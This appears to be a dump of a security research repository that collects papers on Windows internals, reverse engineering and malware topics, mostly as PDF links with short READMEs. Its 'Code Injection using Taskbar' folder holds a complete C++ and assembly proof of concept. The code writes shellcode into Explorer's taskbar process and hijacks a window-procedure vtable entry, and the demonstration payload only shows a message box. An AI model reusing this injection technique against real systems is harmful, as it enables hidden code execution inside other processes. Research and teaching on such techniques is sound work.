├── An overview of Process , Handles & Tokens ├── Ch6.pdf └── README.md ├── Code Injection using Taskbar ├── CodeInjectionusingTaskbar.pdf ├── README.md ├── asm.asm └── src.cpp ├── Evading Malware Analysis Using Reverse Execution ├── Evading Malware Analysis Using Reverse Execution.pdf └── README.md ├── Investigation of Iranian Cyber Hierarchy ├── Investigation of Iranian Cyber Hierarchy.pdf └── README.md ├── LLVM-IR ├── README.md └── un-devs-github-io-low-level-exploration-journey-to-understanding-llvm-ir---1.pdf ├── Maldoc_analysis ├── README.md └── report.pdf ├── Mutation Engine for Fun and Profit ├── Mutation Engine For Fun And Profit.pdf └── README.md ├── Overview_of_Data_Structures_from_The_Art_of_Memory_Forensics ├── Ch.2_-_0x1411.pdf └── README.md ├── PTM - Page Table Manipulation From Usermode ├── PTM_1.pdf └── README.md ├── README.md ├── Registry Analysis ├── Ch.7_-_Registry_Analysis_0x1411.pdf └── README.md ├── Summarizing Windows Internals ├── README.md ├── Windows_Internals_I.pdf ├── Windows_Internals_II.pdf └── Windows_Internals_III.pdf ├── Supply-Chain Attacks ├── README.md └── Supply_Chain.pdf ├── Vulnerable Driver Manipulation ├── README.md └── VDM.pdf └── Windows-Irqls ├── Readme.md ├── Windows Irqls.pdf └── apic.png /An overview of Process , Handles & Tokens/Ch6.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/An overview of Process , Handles & Tokens/Ch6.pdf -------------------------------------------------------------------------------- /An overview of Process , Handles & Tokens/README.md: -------------------------------------------------------------------------------- 1 | Study notes by [V](https://twitter.com/0x1411) 2 | 3 | 4 | **All rights reserved to authors of An overview of Process , Handles & Tokens** 5 | -------------------------------------------------------------------------------- /Code Injection using Taskbar/CodeInjectionusingTaskbar.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Code Injection using Taskbar/CodeInjectionusingTaskbar.pdf -------------------------------------------------------------------------------- /Code Injection using Taskbar/README.md: -------------------------------------------------------------------------------- 1 | Author : [x0r19x91](https://twitter.com/x0r19x91) 2 | -------------------------------------------------------------------------------- /Code Injection using Taskbar/asm.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | main: 4 | push rbx 5 | push rcx 6 | push rdx 7 | push rsi 8 | push rdi 9 | push rbp 10 | push r8 11 | push r9 12 | push r10 13 | push r11 14 | push r12 15 | push r13 16 | push r14 17 | push r15 18 | mov rax, [count] 19 | inc qword ptr [count] 20 | cmp rax, 3 21 | jge bye 22 | xor ecx, ecx 23 | call next 24 | db "Hello World!", 0 25 | 26 | next: 27 | pop rdx 28 | call fuck 29 | db "x0r19x91", 0 30 | 31 | fuck: 32 | pop r8 33 | mov r9d, 040h 34 | mov rax, [fnMessageBoxA] 35 | call rax 36 | 37 | bye: 38 | pop r15 39 | pop r14 40 | pop r13 41 | pop r12 42 | pop r11 43 | pop r10 44 | pop r9 45 | pop r8 46 | pop rbp 47 | pop rdi 48 | pop rsi 49 | pop rdx 50 | pop rcx 51 | pop rbx 52 | ret 53 | 54 | count dq 0 55 | fnMessageBoxA dq 00007FF9D30B2CE0h 56 | 57 | end 58 | -------------------------------------------------------------------------------- /Code Injection using Taskbar/src.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #pragma comment(lib, "user32") 7 | 8 | LPCTSTR pid2name(DWORD dwPid) 9 | { 10 | static char procName[261]; 11 | HANDLE hSnapshot; 12 | PROCESSENTRY32 entry; 13 | hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 14 | if (Process32First(hSnapshot, &entry)) 15 | { 16 | do 17 | { 18 | if (entry.th32ProcessID == dwPid) 19 | { 20 | lstrcpy(procName, entry.szExeFile); 21 | return procName; 22 | } 23 | } 24 | while (Process32Next(hSnapshot, &entry)); 25 | } 26 | 27 | return "(none)"; 28 | } 29 | 30 | HWND g_hwndMSTaskListWClass; 31 | 32 | BOOL WINAPI EnumProc(HWND hWnd, LPARAM lP) 33 | { 34 | static char szClass[128]; 35 | GetWindowText(hWnd, szClass, 127); 36 | if (!lstrcmp(szClass, "Running applications")) 37 | { 38 | g_hwndMSTaskListWClass = hWnd; 39 | } 40 | return TRUE; 41 | } 42 | 43 | typedef struct { 44 | UINT64 pfnAddRef; 45 | UINT64 pfnRelease; 46 | UINT64 pfnWndProc; 47 | } CImpWndProc; 48 | 49 | int main() 50 | { 51 | HWND hw = NULL, hwMSTaskListWClass; 52 | DWORD dwPid; 53 | SIZE_T nRead; 54 | 55 | // EnumWindows(EnumProc, NULL); 56 | 57 | HWND hwShellTray = FindWindowEx(NULL, NULL, "Shell_TrayWnd", NULL); 58 | printf("[<] ShellTrayWnd: %p\n", hwShellTray); 59 | 60 | EnumChildWindows(hwShellTray, EnumProc, NULL); 61 | 62 | printf("[*] Running applications: %p\n", g_hwndMSTaskListWClass); 63 | GetWindowThreadProcessId(g_hwndMSTaskListWClass, &dwPid); 64 | printf("[*] Process: %s (%d)\n", pid2name(dwPid), dwPid); 65 | 66 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid); 67 | printf("[*] Handle: %p\n", hProcess); 68 | 69 | auto m_windowPtr = GetWindowLongPtr(g_hwndMSTaskListWClass, 0); 70 | printf("[*] VTable Ptr Ptr: %p\n", (PVOID)m_windowPtr); 71 | 72 | CImpWndProc m_vTable {}; 73 | UINT64 ptrVTable; 74 | ReadProcessMemory(hProcess, PVOID(m_windowPtr), &ptrVTable, sizeof ptrVTable, &nRead); 75 | printf("[*] VTable Ptr: %p\n", PVOID(ptrVTable)); 76 | ReadProcessMemory(hProcess, PVOID(ptrVTable), &m_vTable, sizeof m_vTable, &nRead); 77 | printf("[CImpWndProc.AddRef] -> %p\n", m_vTable.pfnAddRef); 78 | printf("[CImpWndProc.Release] -> %p\n", m_vTable.pfnRelease); 79 | printf("[CImpWndProc.WndProc] -> %p\n", m_vTable.pfnWndProc); 80 | 81 | // change release to 82 | // mov rax, addr of shellcode 83 | // call rax 84 | // jmp old_release 85 | const char payload[] = {0x53, 0x51, 0x52, 0x56, 0x57, 0x55, 0x41, 0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8B, 0x05, 0x58, 0x00, 0x00, 0x00, 0x48, 0xFF, 0x05, 0x51, 0x00, 0x00, 0x00, 0x48, 0x83, 0xF8, 0x03, 0x7D, 0x34, 0x33, 0xC9, 0xE8, 0x0D, 0x00, 0x00, 0x00, 0x48, 0x65, 0x6C, 0x6C, 0x6F, 0x20, 0x57, 0x6F, 0x72, 0x6C, 0x64, 0x21, 0x00, 0x5A, 0xE8, 0x09, 0x00, 0x00, 0x00, 0x78, 0x30, 0x72, 0x31, 0x39, 0x78, 0x39, 0x31, 0x00, 0x41, 0x58, 0x41, 0xB9, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x05, 0x21, 0x00, 0x00, 0x00, 0xFF, 0xD0, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x41, 0x5B, 0x41, 0x5A, 0x41, 0x59, 0x41, 0x58, 0x5D, 0x5F, 0x5E, 0x5A, 0x59, 0x5B, 0xC3, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE0, 0x2C, 0x0B, 0xD3, 0xF9, 0x7F, 0x00, 0x00}; 86 | size_t payloadSize = sizeof payload; 87 | 88 | auto vTableMem = (UINT64) VirtualAllocEx(hProcess, NULL, 32, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 89 | printf("New VTable: %p\n", vTableMem); 90 | auto vMem = (UINT64)VirtualAllocEx(hProcess, NULL, 4096, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 91 | WriteProcessMemory(hProcess, PVOID(vMem), payload, payloadSize, &nRead); 92 | 93 | printf("[*] Payload Addr: %#016lx\n", vMem); 94 | 95 | std::vector shellcode; 96 | 97 | // mov rax, vMem 98 | shellcode.push_back(uint8_t(0x48)); 99 | shellcode.push_back(uint8_t(0xb8)); 100 | 101 | for (int i = 0; i < 8; i++) 102 | shellcode.push_back(uint8_t(vMem >> i*8 & 0xff)); 103 | 104 | // call rax 105 | shellcode.push_back(uint8_t(0xff)); 106 | shellcode.push_back(uint8_t(0xd0)); 107 | 108 | // mov rax, old_release 109 | shellcode.push_back(uint8_t(0x48)); 110 | shellcode.push_back(uint8_t(0xb8)); 111 | 112 | for (int i = 0; i < 8; i++) 113 | shellcode.push_back(uint8_t(m_vTable.pfnRelease >> i*8 & 0xff)); 114 | 115 | // jmp rax 116 | shellcode.push_back(uint8_t(0xff)); 117 | shellcode.push_back(uint8_t(0xe0)); 118 | 119 | printf("Press Enter To Exploit!\n"); 120 | char sc; 121 | sc = getchar(); 122 | 123 | auto shellcodeAddr = vMem + payloadSize + 15 & -16; 124 | m_vTable.pfnRelease = shellcodeAddr; 125 | printf("[*] Shellcode Addr: %#016lx\n", shellcodeAddr); 126 | WriteProcessMemory(hProcess, PVOID(shellcodeAddr), shellcode.data(), shellcode.size(), &nRead); 127 | WriteProcessMemory(hProcess, PVOID(vTableMem), &m_vTable, sizeof m_vTable, &nRead); 128 | WriteProcessMemory(hProcess, PVOID(m_windowPtr), &vTableMem, sizeof vTableMem, &nRead); 129 | 130 | CloseHandle(hProcess); 131 | } 132 | -------------------------------------------------------------------------------- /Evading Malware Analysis Using Reverse Execution/Evading Malware Analysis Using Reverse Execution.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Evading Malware Analysis Using Reverse Execution/Evading Malware Analysis Using Reverse Execution.pdf -------------------------------------------------------------------------------- /Evading Malware Analysis Using Reverse Execution/README.md: -------------------------------------------------------------------------------- 1 | ## Topic 2 | 3 | - Evading Malware Analysis Using Reverse Execution 4 | 5 | 6 | ## Abstract 7 | 8 | - Malware is a security threat, and various means are 9 | adapted to detect and block them. In this paper, we demonstrate 10 | a method where malware can evade malware analysis. The 11 | method is based on single-step reverse execution of code using 12 | the self-debugging feature. We discuss how self-debugging code 13 | works and use that to derive reverse execution for any payload. 14 | Further, we demonstrate the feasibility of a detection evading 15 | malware through a real implementation that targets Linux x86- 16 | 64 architecture for a reference implementation. The reference 17 | implementation produces one result when run in one direction 18 | and a different result when run in the reverse direction. 19 | 20 | 21 | ## Content Type 22 | 23 | - Research Paper 24 | 25 | 26 | ## Author/s 27 | 28 | - [Adhokshaj Mishra](https://www.linkedin.com/in/adhokshajmishra/) 29 | - [Animesh Roy](https://www.linkedin.com/in/anir0y/) 30 | - [Manjesh K. Hanawal](https://www.ieor.iitb.ac.in/mhanawal) 31 | -------------------------------------------------------------------------------- /Investigation of Iranian Cyber Hierarchy/Investigation of Iranian Cyber Hierarchy.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Investigation of Iranian Cyber Hierarchy/Investigation of Iranian Cyber Hierarchy.pdf -------------------------------------------------------------------------------- /Investigation of Iranian Cyber Hierarchy/README.md: -------------------------------------------------------------------------------- 1 | Author : [Argonyte](https://twitter.com/argonyte) 2 | -------------------------------------------------------------------------------- /LLVM-IR/README.md: -------------------------------------------------------------------------------- 1 | # A Journey to understand LLVM-IR 2 | Download it from ![here!]("https://github.com/AXI4L/Community-Papers/blob/master/LLVM-IR/un-devs-github-io-low-level-exploration-journey-to-understanding-llvm-ir---1.pdf") 3 | 4 | Author : ![Elemental X](https://twitter.com/ElementalX2) 5 | -------------------------------------------------------------------------------- /LLVM-IR/un-devs-github-io-low-level-exploration-journey-to-understanding-llvm-ir---1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/LLVM-IR/un-devs-github-io-low-level-exploration-journey-to-understanding-llvm-ir---1.pdf -------------------------------------------------------------------------------- /Maldoc_analysis/README.md: -------------------------------------------------------------------------------- 1 | Author : [weeb.exe](https://twitter.com/OneeSansOnly) 2 | -------------------------------------------------------------------------------- /Maldoc_analysis/report.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Maldoc_analysis/report.pdf -------------------------------------------------------------------------------- /Mutation Engine for Fun and Profit/Mutation Engine For Fun And Profit.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Mutation Engine for Fun and Profit/Mutation Engine For Fun And Profit.pdf -------------------------------------------------------------------------------- /Mutation Engine for Fun and Profit/README.md: -------------------------------------------------------------------------------- 1 | ## Topic 2 | 3 | * Mutation Engine for Fun And Profit 4 | 5 | ## Agenda 6 | 7 | - Writing metamorphic engine 8 | - Compile time mutation: what and why? 9 | - Programming the programming language 10 | - Compile time evaluation 11 | - Obfuscating data 12 | - Obfuscating code 13 | - Detection and analysis of mutation engines 14 | 15 | 16 | ## Content Type 17 | 18 | - Slides 19 | 20 | ## Author 21 | 22 | - [ADHOKSHAJ MISHRA](https://www.linkedin.com/in/adhokshajmishra/) 23 | -------------------------------------------------------------------------------- /Overview_of_Data_Structures_from_The_Art_of_Memory_Forensics/Ch.2_-_0x1411.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Overview_of_Data_Structures_from_The_Art_of_Memory_Forensics/Ch.2_-_0x1411.pdf -------------------------------------------------------------------------------- /Overview_of_Data_Structures_from_The_Art_of_Memory_Forensics/README.md: -------------------------------------------------------------------------------- 1 | Study notes by [V](https://twitter.com/0x1411) 2 | 3 | 4 | **All rights reserved to authors of The Art of Memory Forensics** 5 | -------------------------------------------------------------------------------- /PTM - Page Table Manipulation From Usermode/PTM_1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/PTM - Page Table Manipulation From Usermode/PTM_1.pdf -------------------------------------------------------------------------------- /PTM - Page Table Manipulation From Usermode/README.md: -------------------------------------------------------------------------------- 1 | This usermode c++ library inherits VDM and can be used to manipulate all memory virtual and physical from usermode. 2 | 3 | Author : [xeroxz](https://twitter.com/_xeroxz) 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Community-Papers 2 | AX1AL is a small community and semi-research group consisting of mostly enthusiasts related to Reverse Engineering, Malware, Windows Internals. Papers and blogs and all other contribution 3 | will be added with full credits, at the community papers archive. Thank you for your time. 4 | 5 | # Authors 6 | 7 | * ![Amr](https://twitter.com/0x1411) 8 | * ![Suvaditya Sur](https://twitter.com/suvaditya_) 9 | * ![Adhokshaj Mishra](https://www.linkedin.com/in/adhokshajmishra/) 10 | * ![Animesh Roy](https://www.linkedin.com/in/anir0y/) 11 | * ![Manjesh K. Hanawal](https://www.ieor.iitb.ac.in/mhanawal) 12 | * ![Argonyte](https://twitter.com/argonyte) 13 | * ![weeb.exe](https://twitter.com/OneeSansOnly) 14 | * ![IDontCode](https://twitter.com/_xeroxz ) 15 | * S.Patil 16 | * ![Interpolice // 0xastr0](https://discord.gg/CBRTkh5MFB ) 17 | * ![Ferib Hellscream](https://twitter.com/FeribHellscream ) 18 | 19 | Thank you to all the authors for the contribution. 20 | -------------------------------------------------------------------------------- /Registry Analysis/Ch.7_-_Registry_Analysis_0x1411.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Registry Analysis/Ch.7_-_Registry_Analysis_0x1411.pdf -------------------------------------------------------------------------------- /Registry Analysis/README.md: -------------------------------------------------------------------------------- 1 | **A mindmap describing key concepts of Registry Analysis by [Amr](https://twitter.com/0x1411).** 2 | 3 | [Download it here.](https://github.com/AXI4L/Community-Papers/blob/master/Registry%20Analysis/Ch.7_-_Registry_Analysis_0x1411.pdf) 4 | -------------------------------------------------------------------------------- /Summarizing Windows Internals/README.md: -------------------------------------------------------------------------------- 1 | Study notes by [V](https://twitter.com/0x1411) 2 | 3 | All rights reserved to Pavel Yosifovich and Pluralsight. 4 | -------------------------------------------------------------------------------- /Summarizing Windows Internals/Windows_Internals_I.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Summarizing Windows Internals/Windows_Internals_I.pdf -------------------------------------------------------------------------------- /Summarizing Windows Internals/Windows_Internals_II.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Summarizing Windows Internals/Windows_Internals_II.pdf -------------------------------------------------------------------------------- /Summarizing Windows Internals/Windows_Internals_III.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Summarizing Windows Internals/Windows_Internals_III.pdf -------------------------------------------------------------------------------- /Supply-Chain Attacks/README.md: -------------------------------------------------------------------------------- 1 | Author : RJ45#7284 ( Discord) 2 | -------------------------------------------------------------------------------- /Supply-Chain Attacks/Supply_Chain.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Supply-Chain Attacks/Supply_Chain.pdf -------------------------------------------------------------------------------- /Vulnerable Driver Manipulation/README.md: -------------------------------------------------------------------------------- 1 | Author : [Xeroxz](https://twitter.com/_xeroxz) 2 | -------------------------------------------------------------------------------- /Vulnerable Driver Manipulation/VDM.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Vulnerable Driver Manipulation/VDM.pdf -------------------------------------------------------------------------------- /Windows-Irqls/Readme.md: -------------------------------------------------------------------------------- 1 | Author : [astr0](https://twitter.com/0xastr0) 2 | 3 | In this paper, we will explain how “Task Priority” and IRQLs work internally in Windows, plus I am providing a poster 4 | explaining the “Interrupt Handling” flow with Pentium 4 and Intel xeon processors. At the end of the paper, before we 5 | start I would like to give a special thanks to [Ahmed Bahaa](https://www.linkedin.com/in/ahmad-bahaa-2367148b) for helping me alot in formatting the paper. Thank you 6 | 7 | Also special thanks to [sinaei](https://twitter.com/Intel80x86?s=09), [drew](https://twitter.com/drewbervisor?s=09) and [xeroxz](https://twitter.com/_xeroxz?s=09) for reviewing the paper. 8 | -------------------------------------------------------------------------------- /Windows-Irqls/Windows Irqls.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Windows-Irqls/Windows Irqls.pdf -------------------------------------------------------------------------------- /Windows-Irqls/apic.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Windows-Irqls/apic.png --------------------------------------------------------------------------------